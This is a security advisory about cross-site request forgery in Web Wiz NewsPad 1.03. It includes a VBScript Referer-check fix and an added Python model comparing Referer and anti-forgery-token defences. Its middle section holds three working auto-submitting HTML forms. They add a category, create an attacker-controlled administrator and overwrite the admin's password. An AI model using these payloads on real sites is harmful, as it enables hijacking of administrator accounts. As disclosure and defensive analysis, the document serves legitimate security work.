Web Wiz NewsPad ~ XSRF | Cyber-Warrior Information Technology's World
Author: Bug Researchers/Equilibrium
Date: 03.02.2009 00:35:50
< ------------------- header data start ------------------- >
#############################################################
# Application Name : Web Wiz NewsPad 1.03
# Vulnerable Type : XSRF (cross-site request forgery)
# Risk : High
# Impact : Form requests submitted from a remote site are written to the database. The admin scripts process a POST carrying the administrator's session cookie without any check that the administrator actually submitted the form, so a page on an attacker's site can add categories and admin users in the administrator's name.
# Bug Fix Advice : Add an HTTP_REFERER check on the line before the database insert is performed. Note that a Referer check only blocks the cross-site submissions shown below; it also rejects legitimate requests from clients that strip the Referer header, and a per-session anti-forgery token in the form is the more robust fix.
< -- BugFix code start -- >
' Classic ASP (VBScript). HTTP_REFERER holds a full URL, so comparing it
' for equality against the bare host name would never match and every
' request would be redirected. Require the site URL as a prefix instead
' (the trailing slash prevents a match on yoursitename.com.attacker.example).
Dim CWBugReserachersEqu
CWBugReserachersEqu = Request.ServerVariables("HTTP_REFERER")
If InStr(1, CWBugReserachersEqu, "http://yoursitename.com/", vbTextCompare) <> 1 Then
    Response.Redirect "Default.asp"
    Response.End
End If
< -- BugFix code End -- >
# author : Bug Researchers/Equilibrium
#############################################################
< ------------------- header data end ------------------- >

< -- bug code start -- >
' XSRF Category Add
' Hosted on the attacker's site. An administrator who is logged in to NewsPad
' and loads this page has the form submitted to the victim site with their own
' session cookie attached; the category name is then stored and rendered.
<body onload="document.frmNewForum.submit()">
<form id="frmNewForum" name="frmNewForum" method="post" action="http://victim-site.com/newspad/admin_category_details.asp?CatID=0">
<input type="hidden" name="mode" value="new">
<input type="hidden" name="postBack" value="true">
<input maxlength="30" size="25" name="category" value="Write Hacked By Attacker or Redirect code">
</form>
</body>
< ------------------------------------------------------------------------------------------------- >
' XSRF Admin User Add
' Same technique against the admin-user creation script: creates a new
' administrator account with credentials chosen by the attacker.
<body onload="document.frmChangepassword.submit()">
<form id="frmChangepassword" name="frmChangepassword" method="post" action="http://victim-site.com/newspad/admin_add_admin_user.asp">
<input maxlength="15" size="15" name="name2" value="Attackerusername">
<input type="password" maxlength="15" size="15" name="password" value="Attackerpass">
<input type="password" maxlength="15" size="15" name="password2" value="Attackerpass">
<input type="hidden" name="postBack" value="true">
</form>
</body>
< ------------------------------------------------------------------------------------------------- >
' XSRF Admin Change password
' Same form fields posted to the username/password change script, replacing
' the existing administrator's credentials with the attacker's.
<body onload="document.frmChangepassword.submit()">
<form id="frmChangepassword" name="frmChangepassword" method="post" action="http://victim-site.com/newspad/admin_change_username.asp">
<input maxlength="15" size="15" name="name2" value="Attackerusername">
<input type="password" maxlength="15" size="15" name="password" value="Attackerpass">
<input type="password" maxlength="15" size="15" name="password2" value="Attackerpass">
<input type="hidden" name="postBack" value="true">
</form>
</body>
< -- bug code end -- >
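As an added example that is not part of this advisory or of Web Wiz NewsPad, the Python below models the category-add handler to show three things: why the Referer check as originally posted (whole URL compared to the bare host name) rejects every request, what the corrected host comparison still gets wrong when a client sends no Referer, and how a per-session anti-forgery token handles the attacker's auto-submitting form and both legitimate cases. The host name, session id, secret and the request dictionaries are constructed placeholders.

```python
"""Constructed model of admin_category_details.asp under three CSRF policies.
Not the application's code; host, session id and secret are placeholders."""
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

SITE_HOST = "yoursitename.com"  # placeholder host from the advisory's fix


def referer_as_written(headers, site_host=SITE_HOST):
    """The advisory's check as posted: the whole Referer URL is compared to the
    bare host name. A Referer is a full URL, so this never matches and every
    request, legitimate or not, is redirected."""
    return headers.get("Referer") == site_host


def referer_check(headers, site_host=SITE_HOST):
    """Corrected Referer check: parse the URL and compare only the host.
    Still rejects clients (proxies, privacy settings) that send no Referer."""
    ref = headers.get("Referer")
    if not ref:
        return False
    return urlsplit(ref).hostname == site_host


def make_csrf_token(session_id: str, secret: bytes) -> str:
    """Token the server embeds as a hidden field when it renders the admin form:
    an HMAC of the session id under a server-only secret, so a page on the
    attacker's site cannot produce it for the administrator's session."""
    return hmac.new(secret, session_id.encode(), hashlib.sha256).hexdigest()


def csrf_token_check(form, session_id, secret) -> bool:
    supplied = form.get("csrf_token", "")
    if not supplied.isascii():  # compare_digest needs ASCII str
        return False
    return hmac.compare_digest(supplied, make_csrf_token(session_id, secret))


def handle_category_add(headers, form, session_id, secret, policy):
    """Models the POST handler. policy is 'none' (shipping behaviour),
    'referer' (advisory's fix, corrected) or 'token'. Returns 'redirect' or
    the insert that would be written to the database."""
    if policy == "referer" and not referer_check(headers):
        return "redirect"
    if policy == "token" and not csrf_token_check(form, session_id, secret):
        return "redirect"
    # In the shipping code this insert runs unconditionally.
    return "inserted:" + form["category"]


# --- constructed requests ---------------------------------------------------
SECRET = secrets.token_bytes(32)        # server-side only
ADMIN_SESSION = "ASPSESSIONID-example"  # cookie the browser attaches in every case

# The advisory's auto-submitting form: the admin's cookie rides along, the
# Referer is the attacker's page, and the form carries no token.
ATTACK = (
    {"Referer": "http://attacker.example/xsrf.html"},
    {"mode": "new", "postBack": "true", "category": "Hacked By Attacker"},
)
# The administrator submitting the real admin form.
LEGIT = (
    {"Referer": f"http://{SITE_HOST}/newspad/admin_category_details.asp?CatID=0"},
    {"mode": "new", "postBack": "true", "category": "News",
     "csrf_token": make_csrf_token(ADMIN_SESSION, SECRET)},
)
# The same legitimate submission from a client that strips the Referer header.
LEGIT_NO_REF = ({}, LEGIT[1])


def outcomes(policy):
    """Result for (attack, legitimate, legitimate-without-Referer) under a policy."""
    return tuple(handle_category_add(h, f, ADMIN_SESSION, SECRET, policy)
                 for h, f in (ATTACK, LEGIT, LEGIT_NO_REF))


if __name__ == "__main__":
    for policy in ("none", "referer", "token"):
        print(policy, outcomes(policy))
```

Under `none` all three requests are inserted, which is the behaviour the advisory reports. Under `referer` the attacker's form is redirected, but so is the legitimate client without a Referer. Under `token` only the attacker's submission is refused, because the token is bound to the administrator's session and the attacker's page cannot compute it.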